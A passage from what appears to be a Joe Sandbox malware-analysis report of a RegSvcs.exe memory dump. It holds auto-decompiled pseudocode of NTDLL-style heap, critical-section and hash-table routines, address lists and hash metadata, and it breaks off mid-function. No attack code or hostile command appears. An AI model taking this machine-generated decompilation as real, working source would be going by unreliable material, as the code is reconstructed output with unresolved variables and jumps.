                                          0x01355486
                                          0x0135548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01355447
                                          0x01355447
                                          0x01355447
                                          0x01355447
                                          0x0135544e
                                          0x00000000
                                          0x00000000
                                          0x01355450
                                          0x01355452
                                          0x01355455
                                          0x0135545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135545c
                                          0x0135546a
                                          0x0135546d
                                          0x0135546f
                                          0x00000000
                                          0x0135546f
                                          0x012fe70f

                                          Strings
                                          • @, xrefs: 012FE6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012FE68C
                                          • InstallLanguageFallback, xrefs: 012FE6DB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 3a65e01dd1d5344fe1695f7e8456349ab6f253a12bdf6de917a4270296809673
                                          • Instruction ID: 3c9911914ff2b8f0d7ac524ef9172fc0e5fd76b729409cfb21d00a40bc57ca2e
                                          • Opcode Fuzzy Hash: 3a65e01dd1d5344fe1695f7e8456349ab6f253a12bdf6de917a4270296809673
                                          • Instruction Fuzzy Hash: E951D6B25143469BD715DF68C440E6BB7E8BF88618F05092EFA85E7250FB34D904C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E0131B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x13e8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E012FB150();
						} else {
							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E012FB150();
						__eflags =  *0x13e7bc8;
						if(__eflags == 0) {
							E013B2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0131AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                          0x0131b8f0
                                          0x0131b8f2
                                          0x0131b8f4
                                          0x01362c4e
                                          0x01362c50
                                          0x01362c56
                                          0x01362c5c
                                          0x01362c60
                                          0x01362c7f
                                          0x01362c84
                                          0x01362c62
                                          0x01362c77
                                          0x01362c7c
                                          0x01362c8a
                                          0x01362c8f
                                          0x01362c94
                                          0x01362c9c
                                          0x01362ca5
                                          0x01362ca5
                                          0x01362c9c
                                          0x01362c50
                                          0x0131b8fa
                                          0x0131b902
                                          0x0131b921
                                          0x0131b921
                                          0x0131b924
                                          0x0131b924
                                          0x0131b927
                                          0x00000000
                                          0x00000000
                                          0x0131b929
                                          0x0131b92b
                                          0x0131b92d
                                          0x0131b940
                                          0x00000000
                                          0x0131b940
                                          0x0131b932
                                          0x0131b932
                                          0x00000000
                                          0x0131b932
                                          0x00000000
                                          0x0131b904
                                          0x0131b904
                                          0x0131b90a
                                          0x0131b90c
                                          0x0131b916
                                          0x0131b919
                                          0x0131b915
                                          0x0131b915
                                          0x0131b91b
                                          0x0131b91b
                                          0x00000000
                                          0x0131b910

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 2b6b447392a0c104cff84ccdd63e2fc58cb3702a2d3eeb199b940c6ff738b5b4
                                          • Instruction ID: 400f9e64be83269774b7028376ddbec6976e547613001a2836013cfb5eb8da0a
                                          • Opcode Fuzzy Hash: 2b6b447392a0c104cff84ccdd63e2fc58cb3702a2d3eeb199b940c6ff738b5b4
                                          • Instruction Fuzzy Hash: A611D0313246469FDB2DDB19C484B36F7BAEB40A28F15816DE54ACB39DD730D841C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0138FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0138FF60
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 3446177414-1911121157
                                          • Opcode ID: 8119eb44691efcf5b2be4089df808a68896f8d1aa67607a7dd1b9b0fe06fe60a
                                          • Instruction ID: 3db4e6f2013745447b339f0fa172d925a083a6a7d65c741eed6a878522cf166e
                                          • Opcode Fuzzy Hash: 8119eb44691efcf5b2be4089df808a68896f8d1aa67607a7dd1b9b0fe06fe60a
                                          • Instruction Fuzzy Hash: A011ED71A10244EFEB22EB58C948F98BBF5BB1870CF148054F6086B2A1C7399958CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013CDFCE Relevance: 3.5, APIs: 2, Instructions: 458COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E013CDFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x13ed360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E0133B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x13e8680
							_v48 = _t15;
							L0131FAD0(_t15);
							_t17 = _t269 + 0xc; // 0x13e8674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E0131FA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E013CE62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E01312280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E0130FFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E0132F3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x13eb1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E0130FFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E013CE5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x13eb1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E013CE7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E013CEE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E013CE7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E0131FA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E013CEE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}
































































                                          0x013cdfce
                                          0x013cdfdd
                                          0x013cdfe1
                                          0x013cdfe3
                                          0x013cdfea
                                          0x013ce49c
                                          0x013ce49c
                                          0x013ce49e
                                          0x013ce4b0
                                          0x013ce4b0
                                          0x013cdff0
                                          0x013cdff5
                                          0x00000000
                                          0x013ce003
                                          0x013ce003
                                          0x013ce006
                                          0x013ce00b
                                          0x013ce00e
                                          0x013ce014
                                          0x013ce07d
                                          0x013ce07d
                                          0x013ce080
                                          0x013ce0d6
                                          0x013ce0dc
                                          0x013ce0de
                                          0x013ce0de
                                          0x013ce0e2
                                          0x013ce0e5
                                          0x013ce0ea
                                          0x013ce0ea
                                          0x013ce0ed
                                          0x013ce0ef
                                          0x013ce0f2
                                          0x013ce0f4
                                          0x013ce0f4
                                          0x013ce0f4
                                          0x013ce0f4
                                          0x013ce0f9
                                          0x013ce100
                                          0x013ce105
                                          0x013ce108
                                          0x013ce10b
                                          0x013ce10f
                                          0x013ce112
                                          0x013ce116
                                          0x013ce119
                                          0x013ce11d
                                          0x013ce122
                                          0x00000000
                                          0x00000000
                                          0x013ce124
                                          0x013ce127
                                          0x013ce12c
                                          0x013ce197
                                          0x013ce199
                                          0x013ce19b
                                          0x013ce1b8
                                          0x013ce1b8
                                          0x013ce1bc
                                          0x013ce1c4
                                          0x013ce1c8
                                          0x013ce1cd
                                          0x013ce1d2
                                          0x013ce1dc
                                          0x013ce1e1
                                          0x013ce1e3
                                          0x013ce1e3
                                          0x013ce1e6
                                          0x013ce1ea
                                          0x013ce1f2
                                          0x013ce1f8
                                          0x013ce1fa
                                          0x013ce1fd
                                          0x013ce201
                                          0x013ce204
                                          0x013ce208
                                          0x013ce20b
                                          0x013ce20f
                                          0x013ce214
                                          0x013ce258
                                          0x013ce258
                                          0x013ce258
                                          0x013ce25d
                                          0x00000000
                                          0x00000000
                                          0x013ce267
                                          0x013ce26d
                                          0x013ce26f
                                          0x013ce2a3
                                          0x013ce2a3
                                          0x013ce2a6
                                          0x013ce2ac
                                          0x013ce2b5
                                          0x013ce2ba
                                          0x013ce2bd
                                          0x013ce2c5
                                          0x013ce418
                                          0x013ce418
                                          0x013ce451
                                          0x013ce45e
                                          0x013ce460
                                          0x013ce463
                                          0x013ce469
                                          0x013ce46b
                                          0x013ce46e
                                          0x013ce470
                                          0x00000000
                                          0x013ce470
                                          0x013ce2cd
                                          0x013ce2dc
                                          0x00000000
                                          0x00000000
                                          0x013ce2e2
                                          0x013ce2e8
                                          0x013ce2ec
                                          0x013ce2ec
                                          0x013ce2fb
                                          0x013ce303
                                          0x013ce305
                                          0x013ce30a
                                          0x013ce47d
                                          0x013ce483
                                          0x00000000
                                          0x00000000
                                          0x013ce485
                                          0x013ce485
                                          0x013ce487
                                          0x013ce48a
                                          0x013ce48f
                                          0x013ce495
                                          0x00000000
                                          0x013ce310
                                          0x013ce310
                                          0x013ce310
                                          0x013ce315
                                          0x013ce328
                                          0x013ce32f
                                          0x013ce331
                                          0x013ce331
                                          0x013ce336
                                          0x013ce340
                                          0x013ce34b
                                          0x013ce34f
                                          0x013ce351
                                          0x013ce35f
                                          0x013ce35f
                                          0x013ce374
                                          0x013ce377
                                          0x013ce3e6
                                          0x013ce3e9
                                          0x013ce3f5
                                          0x013ce3f7
                                          0x013ce3fa
                                          0x013ce3ff
                                          0x013ce40a
                                          0x013ce410
                                          0x013ce415
                                          0x013ce415
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013ce379
                                          0x013ce379
                                          0x013ce379
                                          0x013ce37c
                                          0x013ce37f
                                          0x013ce37f
                                          0x013ce382
                                          0x013ce388
                                          0x00000000
                                          0x00000000
                                          0x013ce38c
                                          0x013ce3b6
                                          0x013ce3c1
                                          0x013ce3c6
                                          0x013ce3c8
                                          0x013ce3ce
                                          0x013ce3d0
                                          0x013ce3d3
                                          0x013ce3d3
                                          0x013ce3d8
                                          0x013ce3d8
                                          0x013ce3db
                                          0x013ce3e2
                                          0x00000000
                                          0x013ce353
                                          0x013ce353
                                          0x013ce355
                                          0x013ce355
                                          0x013ce356
                                          0x013ce358
                                          0x013ce35b
                                          0x00000000
                                          0x013ce355
                                          0x013ce351
                                          0x013ce317
                                          0x013ce31c
                                          0x013ce323
                                          0x013ce326
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013ce31e
                                          0x013ce31e
                                          0x013ce31e
                                          0x013ce31f
                                          0x013ce31f
                                          0x00000000
                                          0x013ce31e
                                          0x013ce30a
                                          0x00000000
                                          0x013ce26f
                                          0x013ce269
                                          0x013ce26b
                                          0x00000000
                                          0x013ce26b
                                          0x013ce216
                                          0x013ce219
                                          0x013ce21e
                                          0x013ce29f
                                          0x013ce286
                                          0x013ce288
                                          0x00000000
                                          0x00000000
                                          0x013ce28a
                                          0x013ce294
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013ce29a
                                          0x013ce252
                                          0x013ce255
                                          0x00000000
                                          0x013ce271
                                          0x013ce27b
                                          0x013ce283
                                          0x00000000
                                          0x013ce283
                                          0x013ce1d4
                                          0x013ce1d4
                                          0x00000000
                                          0x013ce1d4
                                          0x013ce19d
                                          0x013ce19d
                                          0x013ce1a7
                                          0x013ce1a9
                                          0x013ce1a9
                                          0x013ce1ae
                                          0x00000000
                                          0x013ce1ae
                                          0x013ce15d
                                          0x013ce160
                                          0x013ce163
                                          0x013ce166
                                          0x013ce166
                                          0x013ce169
                                          0x013ce169
                                          0x013ce16e
                                          0x00000000
                                          0x00000000
                                          0x013ce177
                                          0x013ce17d
                                          0x013ce17f
                                          0x00000000
                                          0x00000000
                                          0x013ce18d
                                          0x00000000
                                          0x00000000
                                          0x013ce18f
                                          0x00000000
                                          0x013ce18f
                                          0x013ce179
                                          0x013ce17b
                                          0x00000000
                                          0x013ce17b
                                          0x013ce0f4
                                          0x013ce082
                                          0x013ce085
                                          0x013ce0cd
                                          0x013ce0d3
                                          0x013ce0d5
                                          0x00000000
                                          0x013ce0d5
                                          0x013ce087
                                          0x013ce08a
                                          0x013ce0c4
                                          0x013ce0ca
                                          0x013ce0cc
                                          0x00000000
                                          0x013ce0cc
                                          0x013ce08c
                                          0x013ce08f
                                          0x013ce0bb
                                          0x013ce0c1
                                          0x013ce0c3
                                          0x00000000
                                          0x013ce0c3
                                          0x013ce091
                                          0x013ce094
                                          0x013ce0b2
                                          0x013ce0b8
                                          0x013ce0ba
                                          0x00000000
                                          0x013ce0ba
                                          0x013ce096
                                          0x013ce099
                                          0x013ce0a9
                                          0x013ce0af
                                          0x013ce0b1
                                          0x00000000
                                          0x013ce0b1
                                          0x013ce09e
                                          0x00000000
                                          0x00000000
                                          0x013ce0a6
                                          0x013ce0a8
                                          0x00000000
                                          0x013ce0a8
                                          0x013ce018
                                          0x013ce01b
                                          0x013ce01e
                                          0x013ce023
                                          0x013ce025
                                          0x013ce062
                                          0x013ce06a
                                          0x013ce06e
                                          0x013ce073
                                          0x013ce075
                                          0x013ce075
                                          0x013ce07a
                                          0x00000000
                                          0x013ce07a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: be1e20e080cd40a0aa791de163e01aec7478dd3cdb29345e4f4a9c3a75f74e6d
                                          • Instruction ID: 08f3ddb8c41a134f6404af3f3d4934a6470b993ec1f8d6c8c7668a27b3e7e172
                                          • Opcode Fuzzy Hash: be1e20e080cd40a0aa791de163e01aec7478dd3cdb29345e4f4a9c3a75f74e6d
                                          • Instruction Fuzzy Hash: 75F1B172E0022A8BDB18DEA9C9D15BDFFF5EB48604B09827DD916EB381D634DD40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132FAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E0132FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0130EEF0(0x13e7b60);
					_t134 =  *0x13e7b84; // 0x77e47b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x13e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x13e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
